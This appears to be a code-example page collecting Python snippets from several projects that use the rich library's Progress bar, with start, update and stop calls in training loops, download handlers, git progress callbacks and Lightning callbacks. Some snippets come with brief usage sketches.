Code Example #1
def predict(trainData, trainLabel, testData, K=27):
    '''
    Test the model's accuracy
    ===========
    Arguments
    ---------
    - `trainData` training set samples
    - `trainLabel` training set labels
    - `testData` test set samples
    - `K` number of nearest neighbors

    Returns
    -------
    - `predictLabel` predicted labels
    '''
    predictLabel = []

    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(bar_width=None),
        "[progress.percentage]{task.completed}/{task.total}",
        "•",
        TimeRemainingColumn(),
    )  # rich progress bar
    progress.start()

    testTask = progress.add_task("[cyan]predicting...", total=len(testData))

    for x in testData:
        predictLabel.append(NearestNeighbor(trainData, trainLabel, x,
                                            K))  # predict the label for this sample
        progress.update(testTask, advance=1)

    progress.stop()
    return predictLabel
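Examples #1, #6 and #10 share the same manual pattern: build the column layout, call start(), register a task with add_task(), advance it inside the loop, then stop(). A minimal self-contained sketch of that pattern, with the classifier replaced by a placeholder function, could look like this:

# Minimal sketch of the manual Progress pattern above; `classify` is a
# placeholder standing in for NearestNeighbor / machine.classify.
from rich.progress import Progress, BarColumn, TimeRemainingColumn

def classify(x):
    return 0  # dummy prediction

testData = list(range(100))
predictLabel = []

progress = Progress(
    "[progress.description]{task.description}",
    BarColumn(bar_width=None),
    "[progress.percentage]{task.completed}/{task.total}",
    "•",
    TimeRemainingColumn(),
)
progress.start()
task = progress.add_task("[cyan]predicting...", total=len(testData))

for x in testData:
    predictLabel.append(classify(x))
    progress.update(task, advance=1)

progress.stop()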
Code Example #2
class DefaultProgressHandler(BaseProgressHandler):
    def __init__(self):
        self.progress = Progress(
            TextColumn("[bold blue]{task.fields[title]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            DownloadColumn(),
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
        )

    def initialize(self, *args, **kwargs):
        super().initialize(*args)

        self.download_task = self.progress.add_task(self.track_title,
                                                    title=self.track_title,
                                                    total=self.total_size)
        self.progress.start()

    def update(self, *args, **kwargs):
        super().update(**kwargs)
        self.progress.update(self.download_task,
                             advance=self.current_chunk_size)

    def close(self, *args, **kwargs):
        self.progress.stop()
Code Example #3
class ProgressBar:
    OPTIONS = [
        "[progress.description]{task.description}",
        BarColumn(),
        "[progress.percentage]{task.completed:>6}/{task.total}",
        TimeElapsedColumn(),
    ]

    def __init__(self, description, total):
        self.description = description
        self.total = total

    def __enter__(self):
        self.progress = Progress(*self.OPTIONS)
        self.progress.start()
        self.task = self.progress.add_task(self.description, total=self.total)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.progress.stop()

    def print(self, message):
        self.progress.console.print(message)

    def advance(self, advance=1):
        self.progress.update(self.task, advance=advance)
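A possible way to use the context manager above (the work loop and item count here are made up for illustration):

# Hypothetical usage of the ProgressBar context manager defined above.
items = list(range(50))
with ProgressBar("processing...", total=len(items)) as bar:
    for item in items:
        if item % 10 == 0:
            bar.print(f"checkpoint at item {item}")
        bar.advance()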
Code Example #4
File: Downloader.py Project: ruseecz/pydeezer
    class ProgressHandler(BaseProgressHandler):
        def __init__(self):
            self.tracks = {}
            self.progress = Progress(
                TextColumn("[bold blue]{task.fields[title]}", justify="left"),
                BarColumn(bar_width=None),
                "[progress.percentage]{task.percentage:>3.2f}%",
                "•",
                DownloadColumn(),
                "•",
                TransferSpeedColumn(),
                "•",
                TimeRemainingColumn(),
                transient=True)

        def initialize(self, iterable, track_title, track_quality, total_size,
                       chunk_size, **kwargs):
            track_id = kwargs["track_id"]

            task = self.progress.add_task(track_title,
                                          title=track_title,
                                          total=total_size)

            self.progress.console.print(
                f"[bold red]{track_title}[/] has started downloading.")

            self.tracks[track_id] = {
                "id": track_id,
                "iterable": iterable,
                "title": track_title,
                "quality": track_quality,
                "total_size": total_size,
                "chunk_size": chunk_size,
                "task": task,
                "size_downloaded": 0,
                "current_chunk_size": 0
            }

            self.progress.start()

        def update(self, *args, **kwargs):
            track = self.tracks[kwargs["track_id"]]
            track["current_chunk_size"] = kwargs["current_chunk_size"]
            track["size_downloaded"] += track["current_chunk_size"]

            self.progress.update(track["task"],
                                 advance=track["current_chunk_size"])

        def close(self, *args, **kwargs):
            track = self.tracks[kwargs["track_id"]]
            track_title = track["title"]
            self.progress.print(
                f"[bold red]{track_title}[/] is done downloading.")

        def close_progress(self):
            self.progress.refresh()
            self.progress.stop()
Code Example #5
    def format_markdown(path):
        import re
        from rich.progress import Progress
        from .. import user_root
        rt_path = dir_char.join(os.path.abspath(path).split(dir_char)[:-1]) + dir_char
        img_dict = {}
        with open(path, 'r') as fp:
            ct = fp.read()
        aims = re.findall(r'!\[.*?]\((.*?)\)', ct, re.M) + re.findall(r'<img.*?src="(.*?)".*?>', ct, re.M)
        progress = Progress(console=qs_default_console)
        pid = progress.add_task('  Upload' if user_lang != 'zh' else '  上传', total=len(aims))
        progress.start()
        progress.start_task(pid)
        for aim in aims:
            if aim.startswith('http'):  # Uploaded
                qs_default_console.print(qs_warning_string, aim,
                                         'is not a local file' if user_lang != 'zh' else '非本地文件')
                progress.advance(pid, 1)
                continue
            raw_path = aim
            aim = aim.replace('~', user_root)
            aim = aim if aim.startswith(dir_char) else get_path(rt_path, aim)
            if aim not in img_dict:
                qs_default_console.print(qs_info_string, 'Start uploading:' if user_lang != 'zh' else '正在上传:', aim)
                res_dict = post_img(aim)
                if not res_dict:
                    res_table.add_row(aim.split(dir_char)[-1], 'No File' if user_lang != 'zh' else '无文件', '')
                    img_dict[aim] = False
                else:
                    try:
                        res_table.add_row(
                            aim.split(dir_char)[-1], str(res_dict['code']),
                            res_dict['msg'] if res_dict['code'] != 200 else (
                                res_dict['data']['url']
                                if res_dict['data']['url'] else plt_type + ' failed')
                        )
                        img_dict[aim] = res_dict['data']['url'] if res_dict['code'] == 200 else False
                    except Exception:
                        qs_default_console.print(qs_error_string, res_dict)
                        res_table.add_row(aim.split(dir_char)[-1], str(res_dict['code']), res_dict['msg'])
                        img_dict[aim] = False

                if img_dict[aim]:
                    qs_default_console.print(qs_info_string, 'replacing img:' if user_lang != 'zh' else '替换路径',
                                             f'"{raw_path}" with "{img_dict[aim]}"')
                    ct = ct.replace(raw_path, img_dict[aim])
            progress.advance(pid, 1)
        progress.stop()
        with open(path, 'w') as fp:
            fp.write(ct)
        qs_default_console.print(res_table, justify="center")
Code Example #6
def predict(trainData,
            trainLabel,
            testData,
            kernel='Gaussian',
            C=200,
            epsilon=0.0001,
            sigma=10,
            p=2):
    '''
    Test the model's accuracy
    ===========
    Arguments
    ---------
    - `trainData` training set samples
    - `trainLabel` training set labels
    - `testData` test set samples
    - `kernel` kernel function
    - `C` soft-margin penalty parameter
    - `epsilon` slack variable (tolerance)
    - `sigma` Gaussian kernel parameter
    - `p` polynomial kernel parameter

    Returns
    -------
    - `predictLabel` predicted labels
    '''
    predictLabel = []
    machine = SupportVectorMachine(kernel=kernel,
                                   C=C,
                                   epsilon=epsilon,
                                   sigma=sigma)
    machine.train(trainData, trainLabel)

    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(bar_width=None),
        "[progress.percentage]{task.completed}/{task.total}",
        "•",
        TimeRemainingColumn(),
    )  # rich progress bar
    progress.start()

    testTask = progress.add_task("[cyan]predicting...", total=len(testData))

    for testDatum in testData:
        predictLabel.append(machine.classify(testDatum))  # predict the label for this sample
        progress.update(testTask, advance=1)

    progress.stop()
    return predictLabel
Code Example #7
class ProgressBar:
    def __init__(self, total: int) -> None:
        # we will need to inform this processor the total amount of hosts
        # we instantiate a progress bar object
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.completed:>3.0f}/{task.total}",
        )

        # we create four progress bars to track total execution, successes, errors and changes
        self.total = self.progress.add_task("[cyan]Completed...", total=total)
        self.successful = self.progress.add_task("[green]Successful...",
                                                 total=total)
        self.changed = self.progress.add_task("[orange3]Changed...",
                                              total=total)
        self.error = self.progress.add_task("[red]Failed...", total=total)

    def task_started(self, task: Task) -> None:
        # we start the progress bar
        self.progress.start()

    def task_completed(self, task: Task, result: AggregatedResult) -> None:
        # we stop the progress bar
        self.progress.stop()

    def task_instance_started(self, task: Task, host: Host) -> None:
        pass

    def task_instance_completed(self, task: Task, host: Host,
                                results: MultiResult) -> None:
        # we upgrade total execution advancing 1
        self.progress.update(self.total, advance=1)
        if results.failed:
            # if the task failed we increase the progress bar counting errors
            self.progress.update(self.error, advance=1)
        else:
            # if the task succeeded we increase the progress bar counting successes
            self.progress.update(self.successful, advance=1)

        if results.changed:
            # if the task changed the device we increase the progress bar counting changes
            self.progress.update(self.changed, advance=1)

    def subtask_instance_started(self, task: Task, host: Host) -> None:
        pass

    def subtask_instance_completed(self, task: Task, host: Host,
                                   result: MultiResult) -> None:
        pass
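Assuming this class is used as a Nornir 3.x processor, it would be attached with with_processors() before running a task; a rough sketch, where the config path and task function are placeholders:

# Hypothetical wiring, assuming the Nornir 3.x processors API.
from nornir import InitNornir

def noop_task(task):
    # placeholder task that does nothing
    return "ok"

nr = InitNornir(config_file="config.yaml")  # assumed config path
nr_with_bar = nr.with_processors([ProgressBar(total=len(nr.inventory.hosts))])
nr_with_bar.run(task=noop_task)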
Code Example #8
class RichLogger(Logger):
    def __init__(self) -> None:
        self.console = autogoal.logging.console()
        self.logger = autogoal.logging.logger()

    def begin(self, generations, pop_size):
        self.progress = Progress(console=self.console)
        self.pop_counter = self.progress.add_task("Generation", total=pop_size)
        self.total_counter = self.progress.add_task("Overall",
                                                    total=pop_size *
                                                    generations)
        self.progress.start()
        self.console.rule("Search starting", style="blue")

    def sample_solution(self, solution):
        self.progress.advance(self.pop_counter)
        self.progress.advance(self.total_counter)
        self.console.rule("Evaluating pipeline")
        self.console.print(repr(solution))

    def eval_solution(self, solution, fitness):
        self.console.print(Panel(f"📈 Fitness=[blue]{fitness:.3f}"))

    def error(self, e: Exception, solution):
        self.console.print(f"⚠️[red bold]Error:[/] {e}")

    def start_generation(self, generations, best_fn):
        self.progress.update(self.pop_counter, completed=0)
        self.console.rule(
            f"New generation - Remaining={generations} - Best={best_fn or 0:.3f}"
        )

    def update_best(self, new_best, new_fn, previous_best, previous_fn):
        self.console.print(
            Panel(
                f"🔥 Best improved from [red bold]{previous_fn or 0:.3f}[/] to [green bold]{new_fn:.3f}[/]"
            ))

    def end(self, best, best_fn):
        self.console.rule("Search finished")
        self.console.print(repr(best))
        self.console.print(Panel(f"🌟 Best=[green bold]{best_fn or 0:.3f}"))
        self.progress.stop()
        self.console.rule("Search finished", style="red")
Code Example #9
class GitProgress(RemoteProgress):
    def __init__(self):
        super().__init__()
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(None),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "[progress.filesize]{task.fields[msg]}",
        )
        self.current_opcode = None
        self.task = None

    def update(self, opcode, count, max_value, msg=None):
        opcode_strs = {
            self.COUNTING: "Counting",
            self.COMPRESSING: "Compressing",
            self.WRITING: "Writing",
            self.RECEIVING: "Receiving",
            self.RESOLVING: "Resolving",
            self.FINDING_SOURCES: "Finding sources",
            self.CHECKING_OUT: "Checking out",
        }
        stage, real_opcode = opcode & self.STAGE_MASK, opcode & self.OP_MASK

        try:
            count = int(count)
            max_value = int(max_value)
        except ValueError:
            return

        if self.current_opcode != real_opcode:
            if self.task:
                self.progress.update(self.task, total=1, completed=1, msg="")
            self.current_opcode = real_opcode
            self.task = self.progress.add_task(
                opcode_strs[real_opcode].ljust(15), msg="")

        if stage & self.BEGIN:
            self.progress.start()
        if stage & self.END:
            self.progress.stop()
        self.progress.update(self.task,
                             msg=msg or "",
                             total=max_value,
                             completed=count)
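Since GitProgress subclasses GitPython's RemoteProgress, it can be passed as the progress argument of clone or fetch operations; a short sketch with a placeholder URL and target path:

# Hypothetical usage with GitPython; the URL and destination are placeholders.
from git import Repo

Repo.clone_from(
    "https://github.com/example/example.git",
    "/tmp/example",
    progress=GitProgress(),
)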
Code Example #10
def predict(trainData,
            trainLabel,
            testData,
            iteration=200,
            learning_rate=0.0001):
    '''
    Test the model's accuracy
    ===========
    Arguments
    ---------
    - `trainData` training set samples
    - `trainLabel` training set labels
    - `testData` test set samples
    - `iteration` number of iterations
    - `learning_rate` learning rate

    Returns
    -------
    - `predictLabel` predicted labels
    '''
    predictLabel = []
    classifier = LogisticRegressionClassifier(iteration, learning_rate)
    classifier.train(trainData, trainLabel)

    progress = Progress(
        "[progress.description]{task.description}",
        BarColumn(bar_width=None),
        "[progress.percentage]{task.completed}/{task.total}",
        "•",
        TimeRemainingColumn(),
    )  # rich progress bar
    progress.start()

    testTask = progress.add_task("[cyan]predicting...", total=len(testData))

    for testDatum in testData:
        predictLabel.append(classifier.classify(testDatum))  # predict the label for this sample
        progress.update(testTask, advance=1)

    progress.stop()
    return predictLabel
Code Example #11
File: rich_progress.py Project: git2u/httpie
class ProgressDisplay(BaseDisplay):
    def start(self, *, total: Optional[float], at: float,
              description: str) -> None:
        from rich.progress import (
            Progress,
            BarColumn,
            DownloadColumn,
            TimeRemainingColumn,
            TransferSpeedColumn,
        )

        assert total is not None
        self.console.print(f'[progress.description]{description}')
        self.progress_bar = Progress(
            '[',
            BarColumn(),
            ']',
            '[progress.percentage]{task.percentage:>3.0f}%',
            '(',
            DownloadColumn(),
            ')',
            TimeRemainingColumn(),
            TransferSpeedColumn(),
            console=self.console,
            transient=True)
        self.progress_bar.start()
        self.transfer_task = self.progress_bar.add_task(description,
                                                        completed=at,
                                                        total=total)

    def update(self, steps: float) -> None:
        self.progress_bar.advance(self.transfer_task, steps)

    def stop(self, time_spent: Optional[float]) -> None:
        self.progress_bar.stop()

        if time_spent:
            [task] = self.progress_bar.tasks
            self._print_summary(is_finished=task.finished,
                                observed_steps=task.completed,
                                time_spent=time_spent)
Code Example #12
    def train(self, trainData, trainLabel):
        '''
        Train the classifier
        ====================
        Arguments
        ---------
        - `trainData` training set samples
        - `trainLabel` training set labels

        Returns
        -------
        '''
        self.__x = np.insert(np.array(trainData).astype(float),
                             0,
                             values=1.0,
                             axis=1)  # training data with a dummy (bias) column prepended
        self.__y = np.array(trainLabel)  # training labels
        self.__weights = np.zeros(self.__x.shape[1], dtype=float)  # initialize classifier weights

        progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "•",
            TimeRemainingColumn(),
        )  # rich progress bar
        progress.start()

        trainTask = progress.add_task("[cyan]training...",
                                      total=self.__iteration)

        for _ in range(self.__iteration):
            for i in range(self.__x.shape[0]):
                h = self.__sigmoid(np.dot(self.__x[i], self.__weights))
                self.__weights += self.__alpha * \
                    (self.__y[i] - h) * h * (1 - h) * self.__x[i]  # update the weights
                progress.update(trainTask, advance=1 / self.__x.shape[0])

        progress.stop()
        return
Code Example #13
    def stop(self):
        if self._interactive:
            return Progress.stop(self)
        else:
            with self._lock:
                for tid, task in self._tasks.items():
                    status = ""
                    extra = task.fields.get('status_extra', '')
                    if len(extra) > 0:
                        extra = " (%s)" % extra
                    if task.finished:
                        if task.fields.get('status', 'OK') == 'OK':
                            status = "OK"
                        elif task.fields.get('status', 'OK') == 'WARNING':
                            status = "WARNING"
                        else:
                            status = "ERROR"
                    print("%s [ %s ]%s" % (task.description, status, extra),
                          file=self.console.file)
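The method above presumably belongs to a Progress subclass that only renders live output on a terminal; a minimal sketch of how such a subclass might set the _interactive flag (the flag is an assumption inferred from the method, while _lock and _tasks are Progress internals):

# Sketch of the assumed surrounding class; `_interactive` is inferred from
# the stop() override above and is not part of rich itself.
import sys
from rich.progress import Progress

class QuietFallbackProgress(Progress):
    def __init__(self, *columns, **kwargs):
        super().__init__(*columns, **kwargs)
        self._interactive = sys.stdout.isatty()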
Code Example #14
File: youtube_api.py Project: kkatayama/plexarr
class YouTubeAPI(object):
    """Wrapper for YouTubeAPI via youtube_dl
    """
    def __init__(self):
        """Constructor3

        From config:
            cookies (str): Path to Cookies File
        """
        config = ConfigParser()
        config.read(
            os.path.join(os.path.expanduser('~'), '.config', 'plexarr.ini'))

        self.path = config['youtube'].get('path')
        self.temp_dir = config['youtube'].get('temp_dir')
        self.cookies = config['youtube'].get('cookies')
        self.progress = Progress()
        self.task = None
        self.downloaded_bytes = 0
        self.download_status = False

    # -- https://stackoverflow.com/a/58667850/3370913
    def my_hook(self, d):
        # print(d)
        if d['status'] == 'finished':
            self.progress.stop()
            file_tuple = os.path.split(os.path.abspath(d['filename']))
            print(f'Done downloading "{file_tuple[1]}"')
        if d['status'] == 'downloading':
            if not self.download_status:
                try:
                    total = int(d["total_bytes"])
                except KeyError:
                    total = int(d["total_bytes_estimate"])
                self.download_status = True
                self.task = self.progress.add_task("[cyan]Downloading...",
                                                   total=total)
                self.progress.start()
            step = int(d["downloaded_bytes"]) - int(self.downloaded_bytes)
            self.downloaded_bytes = int(d["downloaded_bytes"])
            self.progress.update(self.task, advance=step)
            # print(d['filename'], d['_percent_str'], d['_eta_str'])

    def downloadEpisode(self,
                        video_url: str,
                        mp4_file: str,
                        format_quality=None,
                        output_template=None,
                        embed_subs=True,
                        add_header=None):
        """Downlod YouTube episode into season path folder

        Args:
            Requires - folder (str) - The video title to store the downloaded video
            Requires - video_url (str) - The link of the YouTube video
        """
        # -- setting up path configs
        self.title = os.path.splitext(os.path.split(mp4_file)[1])[0]
        self.folder = os.path.split(mp4_file)[0]
        self.f_name = mp4_file

        ### Download Movie via YoutubeDL ###
        '''
        'socket_timeout': 15,
        'ratelimit': '50K',
        '''
        ytdl_opts = {
            'writesubtitles': True,
            'writeautomaticsub': True,
            'cookiefile': self.cookies,
            'format': "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl': self.f_name,
            'external_downloader_args': ['-loglevel', 'warning', '-stats'],
            'postprocessors': [{
                'key': 'FFmpegEmbedSubtitle'
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': 'srt'
            }],
            'logger': MyLogger(),
            'progress_hooks': [self.my_hook]
        }
        if format_quality:
            ytdl_opts.update({'format': format_quality})
        if output_template:
            ytdl_opts.update({'outtmpl': output_template})
        if not embed_subs:
            ytdl_opts.pop('postprocessors', None)
        if add_header:
            youtube_dl.utils.std_headers.update(add_header)

        with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.download([video_url])
        return ytdl

    def downloadMovie(self, title: str, video_url: str):
        """Downlod YouTube video into folder

        Args:
            Requires - folder (str) - The video title to store the downloaded video
            Requires - video_url (str) - The link of the YouTube video
        """
        # -- setting up path configs
        self.title = title
        self.folder = os.path.join(self.path, title)
        self.f_name = os.path.join(self.path, title, f'{title}.mp4')
        self.video_url_path = os.path.join(self.path, title, 'video_url.txt')

        # -- backup video_url and remove stale directories
        if os.path.exists(self.folder):
            if os.path.exists(self.video_url_path):
                print(
                    f'importing video_url from [magenta]{self.video_url_path}[/magenta]'
                )
                with open(self.video_url_path) as f:
                    video_url = f.readline()
            print(f'deleting existing directory: "{self.folder}"')
            shutil.rmtree(self.folder)

        # -- create fresh directory and backup video_url
        print(f'creating directory: "{self.folder}"')
        print('exporting video_url to [magenta]"video_url.txt"[/magenta]')
        print(f'{{"video_url": {video_url}}}')
        os.mkdir(self.folder)
        with open(self.video_url_path, 'w') as f:
            f.write(f'{video_url}\n')

        ### Download Movie via YoutubeDL ###
        # 'subtitle': '--write-sub --sub-lang en',
        ytdl_opts = {
            'writesubtitles': True,
            'subtitle': '--write-sub --write-auto-sub --embed-subs',
            'cookiefile': self.cookies,
            'format': "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl': self.f_name,
            'postprocessors': [{
                'key': 'FFmpegEmbedSubtitle'
            }],
            'logger': MyLogger(),
            'progress_hooks': [self.my_hook]
        }
        with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.download([video_url])
        return ytdl

    def getInfo(self,
                video_url: str,
                mp4_file: str,
                format_quality=None,
                output_template=None,
                download=False):
        """Fetch metadata for YouTube video

        Args:
            Requires - video_url (str) - The link of the YouTube video
            Requires - path (str) - The parent directory to store the downloaded video
        Returns:
            JSON Object
        """
        # -- setting up path configs
        self.title = os.path.splitext(os.path.split(mp4_file)[1])[0]
        self.folder = os.path.split(mp4_file)[0]
        self.f_name = mp4_file

        ### Download Movie via YoutubeDL ###
        ytdl_opts = {
            'writesubtitles': True,
            'writeautomaticsub': True,
            'cookiefile': self.cookies,
            'format': "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl': self.f_name,
            'postprocessors': [{
                'key': 'FFmpegEmbedSubtitle'
            }],
            'logger': MyLogger(),
            'progress_hooks': [self.my_hook]
        }
        if format_quality:
            ytdl_opts.update({'format': format_quality})
        if output_template:
            ytdl_opts.update({'outtmpl': output_template})

        with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
            metadata = ytdl.extract_info(video_url, download=download)
        return metadata
Code Example #15
class RichProgressBar(ProgressBarBase):
    def __init__(self):
        super().__init__()
        self.pg = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.completed}/{task.total}",
            BarDictColumn(),
            transient=True,
            expand=True,
            refresh_per_second=2,
        )
        self._train_id = self._val_id = self._test_id = None

    def disable(self):
        self.pg.disable = True

    def enable(self):
        self.pg.disable = False

    def on_train_start(self, trainer, pl_module):
        super().on_train_start(trainer, pl_module)
        self.pg.start()

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        super().on_test_batch_end(trainer, pl_module, outputs, batch,
                                  batch_idx, dataloader_idx)
        bardic = pl_module.get_progress_bar_dict()
        self.pg.update(self._test_id, completed=self.test_batch_idx, **bardic)
        if self.test_batch_idx >= self.total_test_batches:
            self.pg.stop_task(self._test_id)

    def on_test_epoch_start(self, trainer, pl_module) -> None:
        super().on_test_epoch_start(trainer, pl_module)
        if self._test_id is not None:
            self.pg.remove_task(self._test_id)
        self._test_id = self.pg.add_task("epoch T%03d" % trainer.current_epoch,
                                         total=self.total_test_batches)

    def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                           dataloader_idx):
        super().on_train_batch_end(trainer, pl_module, outputs, batch,
                                   batch_idx, dataloader_idx)
        bardic = pl_module.get_progress_bar_dict()
        self.pg.update(self._train_id,
                       completed=self.train_batch_idx,
                       **bardic)
        if self.train_batch_idx >= self.total_train_batches:
            self.pg.stop_task(self._train_id)

    def on_train_epoch_start(self, trainer, pl_module):
        super().on_train_epoch_start(trainer, pl_module)
        if self._train_id is not None:
            self.pg.remove_task(self._train_id)
        if self._val_id is not None:
            self.pg.remove_task(self._val_id)
        self._train_id = self.pg.add_task("epoch T%03d" %
                                          trainer.current_epoch,
                                          total=self.total_train_batches)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        super().on_validation_batch_end(trainer, pl_module, outputs, batch,
                                        batch_idx, dataloader_idx)
        bardic = pl_module.get_progress_bar_dict()
        self.pg.update(self._val_id, completed=self.val_batch_idx, **bardic)
        if self.val_batch_idx >= self.total_val_batches:
            self.pg.stop_task(self._val_id)

    def on_validation_epoch_start(self, trainer, pl_module) -> None:
        super().on_validation_epoch_start(trainer, pl_module)
        self._val_id = self.pg.add_task("epoch V%03d" % trainer.current_epoch,
                                        total=self.total_val_batches)

    def on_train_end(self, trainer, pl_module):
        super().on_train_end(trainer, pl_module)
        self.pg.stop()

    def print(self, *args, **kwargs):
        self.pg.console.print(*args, **kwargs)
Code Example #16
File: progress.py Project: sixtyfive/kraken
class KrakenTrainProgressBar(ProgressBarBase):
    """
    Adaptation of the default ptl rich progress bar to fit with kraken (segtrain, train) output.

    Args:
        refresh_rate: Determines at which rate (in number of batches) the progress bars get updated.
            Set it to ``0`` to disable the display.
        leave: Leaves the finished progress bar in the terminal at the end of the epoch. Default: False
        console_kwargs: Args for constructing a `Console`
    """
    def __init__(self,
                 refresh_rate: int = 1,
                 leave: bool = True,
                 console_kwargs: Optional[Dict[str, Any]] = None) -> None:
        super().__init__()
        self._refresh_rate: int = refresh_rate
        self._leave: bool = leave
        self._console_kwargs = console_kwargs or {}
        self._enabled: bool = True
        self.progress: Optional[Progress] = None
        self.val_sanity_progress_bar_id: Optional[int] = None
        self._reset_progress_bar_ids()
        self._metric_component = None
        self._progress_stopped: bool = False

    @property
    def refresh_rate(self) -> float:
        return self._refresh_rate

    @property
    def is_enabled(self) -> bool:
        return self._enabled and self.refresh_rate > 0

    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled

    def disable(self) -> None:
        self._enabled = False

    def enable(self) -> None:
        self._enabled = True

    @property
    def sanity_check_description(self) -> str:
        return "Validation Sanity Check"

    @property
    def validation_description(self) -> str:
        return "Validation"

    @property
    def test_description(self) -> str:
        return "Testing"

    def _init_progress(self, trainer):
        if self.is_enabled and (self.progress is None
                                or self._progress_stopped):
            self._reset_progress_bar_ids()
            self._console = Console(**self._console_kwargs)
            self._console.clear_live()
            columns = self.configure_columns(trainer)
            self._metric_component = MetricsTextColumn(trainer)
            columns.append(self._metric_component)

            if trainer.early_stopping_callback:
                self._early_stopping_component = EarlyStoppingColumn(trainer)
                columns.append(self._early_stopping_component)

            self.progress = Progress(*columns,
                                     auto_refresh=False,
                                     disable=self.is_disabled,
                                     console=self._console)
            self.progress.start()
            # progress has started
            self._progress_stopped = False

    def refresh(self) -> None:
        if self.progress:
            self.progress.refresh()

    def on_train_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_test_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_validation_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_start(self, trainer, pl_module):
        self._init_progress(trainer)

    def on_sanity_check_end(self, trainer, pl_module):
        if self.progress is not None:
            self.progress.update(self.val_sanity_progress_bar_id,
                                 advance=0,
                                 visible=False)
        self.refresh()

    def on_train_epoch_start(self, trainer, pl_module):
        total_train_batches = self.total_train_batches
        total_val_batches = self.total_val_batches
        if total_train_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            total_val_batches = total_val_batches * val_checks_per_epoch

        total_batches = total_train_batches + total_val_batches

        train_description = f"stage {trainer.current_epoch}/{trainer.max_epochs if pl_module.hparams.quit == 'dumb' else '∞'}"
        if len(self.validation_description) > len(train_description):
            # Padding is required to avoid flickering due of uneven lengths of "Epoch X"
            # and "Validation" Bar description
            num_digits = len(str(trainer.current_epoch))
            required_padding = (len(self.validation_description) -
                                len(train_description) + 1) - num_digits
            for _ in range(required_padding):
                train_description += " "

        if self.main_progress_bar_id is not None and self._leave:
            self._stop_progress()
            self._init_progress(trainer)
        if self.main_progress_bar_id is None:
            self.main_progress_bar_id = self._add_task(total_batches,
                                                       train_description)
        elif self.progress is not None:
            self.progress.reset(self.main_progress_bar_id,
                                total=total_batches,
                                description=train_description,
                                visible=True)
        self.refresh()

    def on_validation_epoch_start(self, trainer, pl_module):
        if trainer.sanity_checking:
            self.val_sanity_progress_bar_id = self._add_task(
                self.total_val_batches, self.sanity_check_description)
        else:
            self.val_progress_bar_id = self._add_task(
                self.total_val_batches,
                self.validation_description,
                visible=False)
        self.refresh()

    def _add_task(self,
                  total_batches: int,
                  description: str,
                  visible: bool = True) -> Optional[int]:
        if self.progress is not None:
            return self.progress.add_task(f"{description}",
                                          total=total_batches,
                                          visible=visible)

    def _update(self,
                progress_bar_id: int,
                current: int,
                total: Union[int, float],
                visible: bool = True) -> None:
        if self.progress is not None and self._should_update(current, total):
            leftover = current % self.refresh_rate
            advance = leftover if (current == total
                                   and leftover != 0) else self.refresh_rate
            self.progress.update(progress_bar_id,
                                 advance=advance,
                                 visible=visible)
            self.refresh()

    def _should_update(self, current: int, total: Union[int, float]) -> bool:
        return self.is_enabled and (current % self.refresh_rate == 0
                                    or current == total)

    def on_validation_epoch_end(self, trainer, pl_module):
        if self.val_progress_bar_id is not None and trainer.state.fn == "fit":
            self.progress.update(self.val_progress_bar_id,
                                 advance=0,
                                 visible=False)
            self.refresh()

    def on_validation_end(self, trainer: "pl.Trainer",
                          pl_module: "pl.LightningModule") -> None:
        if trainer.state.fn == "fit":
            self._update_metrics(trainer, pl_module)

    def on_test_epoch_start(self, trainer, pl_module):
        self.test_progress_bar_id = self._add_task(self.total_test_batches,
                                                   self.test_description)
        self.refresh()

    def on_train_batch_end(self, trainer, pl_module, outputs, batch,
                           batch_idx):
        self._update(self.main_progress_bar_id, self.train_batch_idx,
                     self.total_train_batches)
        self._update_metrics(trainer, pl_module)
        self.refresh()

    def on_train_epoch_end(self, trainer: "pl.Trainer",
                           pl_module: "pl.LightningModule") -> None:
        self._update_metrics(trainer, pl_module)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        if trainer.sanity_checking:
            self._update(self.val_sanity_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        elif self.val_progress_bar_id is not None:
            # check to see if we should update the main training progress bar
            if self.main_progress_bar_id is not None:
                self._update(self.main_progress_bar_id, self.val_batch_idx,
                             self.total_val_batches)
            self._update(self.val_progress_bar_id, self.val_batch_idx,
                         self.total_val_batches)
        self.refresh()

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        self._update(self.test_progress_bar_id, self.test_batch_idx,
                     self.total_test_batches)
        self.refresh()

    def _stop_progress(self) -> None:
        if self.progress is not None:
            self.progress.stop()
            # signals for progress to be re-initialized for next stages
            self._progress_stopped = True

    def _reset_progress_bar_ids(self):
        self.main_progress_bar_id: Optional[int] = None
        self.val_progress_bar_id: Optional[int] = None
        self.test_progress_bar_id: Optional[int] = None

